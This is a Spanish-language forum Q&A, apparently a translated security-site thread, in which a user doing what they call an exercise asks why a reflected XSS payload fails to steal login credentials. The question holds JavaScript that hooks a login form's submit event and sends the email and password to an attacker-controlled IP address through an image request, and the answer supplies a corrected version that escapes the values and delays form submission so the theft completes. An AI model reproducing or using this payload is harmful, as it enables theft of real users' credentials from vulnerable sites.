Carga útil XSS para capturar credenciales de inicio de sesión

1

Estoy tratando de resolver este ejercicio . El objetivo de esto es "Publicar el nombre de usuario y la contraseña en el servidor controlado por el atacante". Hay un parámetro url que toma el servidor y se refleja de nuevo en la página. Que es lo que necesitamos usar como el vector XSS.

Ahora, he escrito un guión como este:

<script type="text/javascript"> 
function HijackCred() {
    var email = document.forms[0].elements[0].value;
    var pass = document.forms[0].elements[1].value;
    img = document.createElement("img");
    img.src = "http://192.168.2.25:8080?" + "email=" + email + "&" + "password=" + pass;
}
document.forms[0].onsubmit = HijackCred;
</script>

La inyección funciona bien ya que puedo ver el script reflejado en la página. Sin embargo, la carga útil del script no envía las credenciales al servidor controlado por el atacante. ¿Alguna sugerencia?

    
pregunta user1720897 15.07.2015 - 09:07
fuente

1 respuesta

2

Haré algunas enmiendas a tu guión:

img = new Image();
img.src = "http://192.168.2.25:8080?" + "email=" + escape(email) + "&" + "password=" + escape(pass);
setTimeout('document.forms[0].submit();', 3000);
return false;

Esto debería enviar los datos a la página del atacante y luego enviar el formulario después de 3 segundos, una vez que el navegador haya tenido la oportunidad de enviar las credenciales al atacante.

    
respondido por el SilverlightFox 15.07.2015 - 11:43
fuente

Lea otras preguntas en las etiquetas